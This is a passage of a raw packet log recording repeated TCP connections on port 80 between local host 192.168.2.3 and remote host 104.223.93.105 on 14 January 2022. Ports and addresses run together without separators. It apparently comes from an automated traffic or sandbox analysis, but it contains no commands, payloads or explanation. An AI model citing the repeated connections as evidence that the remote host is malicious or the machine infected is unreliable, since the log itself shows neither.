              Jan 14, 2022 09:53:20.097656965 CET4977080192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:20.220742941 CET8049770104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.047007084 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.171355963 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.171902895 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.176589966 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.302092075 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.303132057 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.427753925 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.435849905 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.435897112 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:21.436203003 CET4977180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:21.561022043 CET8049771104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.666246891 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.790328979 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.790483952 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.793267965 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:22.917289019 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:22.920172930 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.113514900 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150387049 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150677919 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:23.150793076 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.296163082 CET4977280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:23.420478106 CET8049772104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.120821953 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.246565104 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.246664047 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.250387907 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.374768019 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.374854088 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.500363111 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508188009 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508251905 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:25.508382082 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.508457899 CET4977380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:25.635023117 CET8049773104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.503109932 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.625806093 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.625920057 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.628571033 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.751311064 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.751445055 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.873924017 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881258965 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881376028 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:26.881400108 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:26.881453037 CET4977580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:27.004054070 CET8049775104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:27.943618059 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.066205978 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.066376925 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.069977045 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.194497108 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.194595098 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.317151070 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325772047 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325805902 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:28.325910091 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.325938940 CET4978180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:28.448967934 CET8049781104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.306583881 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.431618929 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.435159922 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.435189962 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.563728094 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.567574978 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.692378044 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.699652910 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.699667931 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:29.700038910 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.700052977 CET4978980192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:29.824692011 CET8049789104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.249636889 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.372044086 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.373085976 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.376585007 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.498994112 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.501925945 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.624532938 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632582903 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632626057 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:32.632708073 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.632745028 CET4980680192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:32.755970955 CET8049806104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.668543100 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.793478012 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.793773890 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.797107935 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:34.921138048 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:34.921205997 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.045180082 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055516958 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055536985 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:35.055625916 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.055655956 CET4981380192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:35.179922104 CET8049813104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.390980959 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.514982939 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.515525103 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.518335104 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.642352104 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.642458916 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.766614914 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778532028 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778564930 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:38.778651953 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.778692007 CET4981480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:38.903242111 CET8049814104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:42.339562893 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:42.463573933 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:42.463762999 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:42.966613054 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:43.100037098 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:43.102488041 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:43.276439905 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:43.286082029 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:43.286115885 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:43.286218882 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:43.286248922 CET4981580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:43.456432104 CET8049815104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.259232044 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.381932020 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.382045984 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.386625051 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.509217024 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.509305954 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.631870985 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.642754078 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.642770052 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:50.642895937 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.643001080 CET4982180192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:50.765794992 CET8049821104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.142047882 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.266123056 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.266206980 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.269267082 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.395263910 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.395328999 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.520034075 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.529158115 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.529268980 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:54.529285908 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.529316902 CET4982280192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:54.653960943 CET8049822104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:56.910099030 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.032663107 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:57.032762051 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.036107063 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.158622980 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:57.158740997 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.281152010 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:57.289953947 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:57.290020943 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:57.290108919 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.290502071 CET4982480192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:57.414272070 CET8049824104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:59.478718042 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:59.602664948 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:53:59.602826118 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:53:59.975080013 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:00.099400997 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:00.099469900 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:00.261131048 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:00.267862082 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:00.267879963 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:00.267966986 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:00.267999887 CET4982580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:00.392546892 CET8049825104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:01.958154917 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.083828926 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:02.083956003 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.086796045 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.212471008 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:02.212654114 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.337027073 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:02.343744040 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:02.343775034 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:02.343929052 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.343960047 CET4982680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:02.468472004 CET8049826104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.376602888 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.503099918 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.503205061 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.505878925 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.630043030 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.630158901 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.754757881 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.763714075 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.763926029 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.764245987 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:03.764323950 CET4983280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:03.894449949 CET8049832104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:04.780109882 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:04.903615952 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:04.903791904 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:04.907351017 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:05.029817104 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:05.030078888 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:05.152621984 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:05.161437035 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:05.161470890 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:05.164660931 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:05.164720058 CET4984080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:05.288018942 CET8049840104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.473889112 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.604805946 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.605096102 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.608302116 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.732795000 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.732930899 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.858572960 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.866544008 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.866569042 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:07.869054079 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.869097948 CET4985280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:07.993654013 CET8049852104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.581646919 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:10.705517054 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.705708027 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:10.712951899 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:10.835719109 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.835877895 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:10.960030079 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.966197014 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.966240883 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:10.966450930 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:10.966733932 CET4985380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:11.090085030 CET8049853104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.444958925 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:14.678246975 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.678423882 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:14.681171894 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:14.805207014 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.805303097 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:14.933281898 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.940711975 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.940762997 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:14.940870047 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:14.941514015 CET4985480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:15.104063034 CET8049854104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:16.891421080 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.015642881 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:17.017808914 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.053160906 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.177468061 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:17.180231094 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.304373980 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:17.313810110 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:17.313905001 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:17.313967943 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.314060926 CET4985580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:17.438457966 CET8049855104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.183954954 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.309046984 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.309209108 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.315522909 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.439687967 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.439775944 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.564701080 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.574155092 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.574270964 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:20.574302912 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.574352980 CET4985680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:20.698834896 CET8049856104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.150954962 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.275007010 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.275120020 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.278675079 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.413964033 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.414038897 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.538590908 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.548707962 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.548749924 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:22.548811913 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.549343109 CET4985780192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:22.673228025 CET8049857104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:24.627247095 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:24.755486012 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:24.755637884 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:24.759273052 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:24.883593082 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:24.883680105 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:25.007806063 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:25.014372110 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:25.014393091 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:25.014537096 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:25.014580965 CET4985880192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:25.139523029 CET8049858104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:25.992810965 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.120533943 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:26.120656013 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.128942013 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.255944014 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:26.256269932 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.380359888 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:26.390346050 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:26.390363932 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:26.390472889 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.390511036 CET4985980192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:26.520668030 CET8049859104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.327622890 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.451699972 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.451808929 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.459033012 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.583070040 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.583146095 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.707375050 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.717861891 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.717950106 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:27.718023062 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.718555927 CET4986080192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:27.842720985 CET8049860104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:28.616265059 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:28.739173889 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:28.742439032 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:28.746130943 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:28.882603884 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:28.882826090 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:29.010432959 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:29.017143965 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:29.017170906 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:29.017276049 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:29.017318964 CET4986180192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:29.140120029 CET8049861104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.050865889 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.175286055 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.175498009 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.197088957 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.321353912 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.321491957 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.446279049 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.453828096 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.453915119 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:30.453955889 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.453982115 CET4986280192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:30.578679085 CET8049862104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.372874975 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.495564938 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.495714903 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.498490095 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.621664047 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.621882915 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.744261980 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.754610062 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.754734993 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:31.754847050 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.754877090 CET4986380192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:31.878398895 CET8049863104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:32.678761005 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:32.825844049 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:32.825999022 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:32.828735113 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:32.953165054 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:32.953716993 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:33.097723961 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:33.107048988 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:33.107198954 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:33.107671976 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:33.107748032 CET4986480192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:33.232752085 CET8049864104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.111469984 CET4986580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:34.235866070 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.236105919 CET4986580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:34.246263981 CET4986580192.168.2.3104.223.93.105
